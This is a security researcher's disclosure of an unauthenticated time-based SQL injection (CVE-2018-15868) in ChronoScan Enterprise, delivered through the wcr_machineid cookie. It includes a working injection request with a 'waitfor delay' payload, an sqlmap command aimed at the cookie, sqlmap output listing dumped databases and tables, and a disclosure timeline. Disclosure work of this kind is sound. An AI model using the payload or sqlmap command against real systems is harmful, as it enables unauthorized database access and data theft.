ChronoScan Enterprise Unauthenticated SQL Injection
ChronoScan is an OCR software created by ChronoScan Capture S.L. used to read and parse of data from documents it receives. The software will take a document/pdf and based on how you have it setup, parse selected data from the input file. This is especially helpful in situations where there is an automated process sending a high number of documents that need to be put into a database or some other type of storage quickly. They have a community and enterprise versions.
I've identified an unauthenticated time-based SQL injection on the latest ChronoScan enterprise version (v18.104.22.168 as of 8-24-2018). This vulnerability has not yet been confirmed on other versions but, due to the nature of the attack (unauthenticated, no specific parameters, etc), I believe it's present on all versions up to this point. I will update this post when the vendor has confirmed to which versions are affected.
The vulnerability lies in how the
wcr_machineid cookie is used with identifying users and the sessions associated with them. In this case, it seems as though the
wcr_machineid cookie is inserted unsanitized into a SQL statement to check the current “machines” access level. An unauthenticated attacker can (even without a valid
wcr_machineid cookie) exploit a time-based SQL injection. Below is the request that was originally used for identification.
GET / HTTP/1.1 Host: vulnerable:10000 Accept-Encoding: gzip, deflate Accept: */* User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0 Connection: close Cache-Control: max-age=0 Referer: http://vulnerable:10000/?wtd=VQWist5qQW3IS6uy Cookie: wcr_machineid=')waitfor%20delay'0%3a0%3a20'--; wcr_uspw=deleted; wcr_repw=1
If you compare this request (a delay of 20 seconds) to one without the SQL statement, you will see it takes ~20 seconds for the response to come back. I took this and ran the following command in sqlmap which led to confirmation of a vulnerability.
sqlmap -u "http://vulnerable:10000" --cookie="wcr_machineid=*;wcr_uspw=deleted;wcr_repw=1"
After confirmation, I dumped the following databases.
[*] CHRONOSCAN [*] master [*] model [*] msdb [*] tempdb
Dumping the tables (60 total) from the CHRONOSCAN database gave me the following.
[12:01:33] [INFO] fetching tables for database: CHRONOSCAN [12:01:33] [INFO] fetching number of tables for database 'CHRONOSCAN' [12:01:33] [INFO] resumed: 60 [12:01:33] [INFO] resumed: dbo.chrono_Buyers [12:01:33] [INFO] resumed: dbo.chrono_Suppliers [12:01:33] [INFO] resumed: dbo.chronosys_csi_export_history [12:01:33] [INFO] resumed: dbo.chronosys_csi_user_params [12:01:33] [INFO] resumed: dbo.chronosys_doctype_options [12:01:33] [INFO] resumed: dbo.chronosys_entities [12:01:33] [INFO] resumed: dbo.chronosys_entities_params [12:01:33] [INFO] resumed: dbo.chronosys_entity_masterkey_line_account [12:01:33] [INFO] resumed: dbo.chronosys_event_track [12:01:33] [INFO] resumed: dbo.chronosys_job_types_cache (snip)
-August 24, 2018: Vulnerability Identified -August 24, 2018: Vendor Notified & Acknowledged -August 24, 2018: CVE ID requested -August 24, 2018: CVE-2018-15868 reserved -August 27, 2018: Details provided to MITRE -August 28, 2018: Vendor issues patch for verification (not public yet)